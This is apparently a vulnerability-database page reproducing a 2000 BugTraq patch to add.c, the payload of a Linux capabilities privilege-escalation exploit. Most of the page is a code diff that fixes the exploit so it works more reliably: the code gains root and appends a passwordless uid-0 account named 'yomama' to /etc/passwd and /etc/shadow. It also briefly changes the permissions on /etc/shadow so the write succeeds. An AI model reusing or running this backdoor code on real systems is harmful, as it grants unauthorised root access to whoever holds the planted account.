• info
• discussion
• exploit
• solution
• references

Linux Capabilities Vulnerability

This patch (for the component add.c included in "linux-cap-exp.txt") was posted to BugTraq on June 8, 2000 by "Mark K. Pettit" <pettit@yahoo-inc.com> and fixes a couple of minor problems with that exploit. It fixes a missing \n and makes the exploit work on systems with the shadow file set to mode 400.

--- add.c.orig Thu Jun 8 11:32:33 2000
+++ add.c Thu Jun 8 11:21:15 2000
@@ -1,17 +1,24 @@
#include <fcntl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <unistd.h>

int main (void) {
int fd;
char string[40];
+ struct stat buf;

seteuid(0);
fd = open("/etc/passwd", O_APPEND|O_WRONLY);
strcpy(string, "yomama:x:0:0::/root:/bin/sh\n");
write(fd, string, strlen(string));
close(fd);
+ stat("/etc/shadow", &buf);
+ chmod("/etc/shadow", S_IRUSR|S_IWUSR);
fd = open("/etc/shadow", O_APPEND|O_WRONLY);
- strcpy(string, "yomama::11029:0:99999:7:::");
+ strcpy(string, "yomama::11029:0:99999:7:::\n");
write(fd, string, strlen(string));
close(fd);
-
+ chmod("/etc/shadow", buf.st_mode);
}

• /data/vulnerabilities/exploits/linux-cap-exp.txt
• /data/vulnerabilities/exploits/cap-procmail-sendmail.txt